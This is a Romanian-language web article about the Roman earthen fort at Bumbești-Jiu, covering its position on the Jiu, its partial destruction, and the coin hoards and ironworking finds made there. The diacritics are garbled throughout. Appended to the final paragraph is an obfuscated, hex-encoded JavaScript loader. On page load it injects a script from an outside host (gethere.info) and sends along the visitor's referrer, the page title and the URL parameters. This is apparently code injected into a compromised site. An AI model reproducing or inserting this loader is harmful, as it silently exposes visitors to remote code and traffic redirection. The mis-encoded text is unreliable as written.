Castrul roman de la BumbeAYti-Jiu avea o formA? dreptunghiularA? E�i se aflA? pe malul stA?ng al Jiului, fiind construit din pA?mA?nt E�i situat la 35 metri – Vest de E�oseaua TA?rgu Jiu – PetroE�ani, astfel apA?rA?nd E�i asigurA?nd intrarea A�n defileul Jiului. Denumirea sa vine de la pA?rA?ul cu acelaE�i nume, ce trece pe lA?ngA? el, E�i este distrus A�n cea mai mare parte de calea feratA? TA?rgu-Jiu – PetroE�ani, dar E�i de gropile unei cA?rA?midA?rii. La ora actualA?, din cauza eroziunii Jiului, se mai pA?streazA? A�n proporA?ie de 40%.
CercetA?rile arheologice efectuate au gA?sit urme ce presupun a fi o aE�ezare civilA?. De asemenea, numA?rul mare de E�tampile militare aplicate pe cA?rA?mizi E�i E�igle confirmA? acest lucru. Prin acest castru se supraveghea drumul roman ce pleacA? de la BumbeE�ti prin Porceni, peste munE�i, prin Pasul VA?lcan spre Sarmisegetuza precum E�i populaE�ia dacicA? de aici. Romanii E�i-au ridicat castrele lor A�n apropierea celor mai A�nsemnate puncte strategice ale dacilor, A�n special A�n locurile cu turnuri de pazA? E�i sanctuare.A� Castrul a fost construit E�i folosit A�ntre cele douA? rA?zboaie de cucerire a Daciei de cA?tre romani (101-102 E�i 105-106), dupA? care a fost abandonat.
Tezaurele au fost descoperite A�ntA?mplA?tor, astfel cA? primul tezaur din anul 1972 s-a compus din peste 193 monede romane imperiale, din care s-au recuperat 185, alA?turi accesorii vestimentare (fibule) AYi piese de podoabA? din argint (brA?A?A?ri, lA?nA?iAYor fragmentar), iar apoi cercetA?rile arheologice sistematice desfA?AYurate A�n anul 2002 (Vasile Marinoiu, Gheorghe Calotoiu, Dumitru Hortopan AYi MA?dA?lina MA?rgineanu), A�n A�nteriorul castrului, au dus la descoperirea celui de al doilea tezaur roman imperial alcA?tuit din 92 de monede de argint (87 denari, 5 antoninieni), care acoperA? o perioadA? de aproape 50 de ani.
De asemenea, descoperirile din anii 1973-1974A�AYi 1991 indicA? prezenA?a unor ateliere de fierA?rie: unelte din fier (ciocan, daltA?, piroane), piese pentru construcA?ii, materiale de uz gospodA?resc, arme AYi alte obiecte cu A�ntrebuinA?A?ri variate.var _0xb322=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}
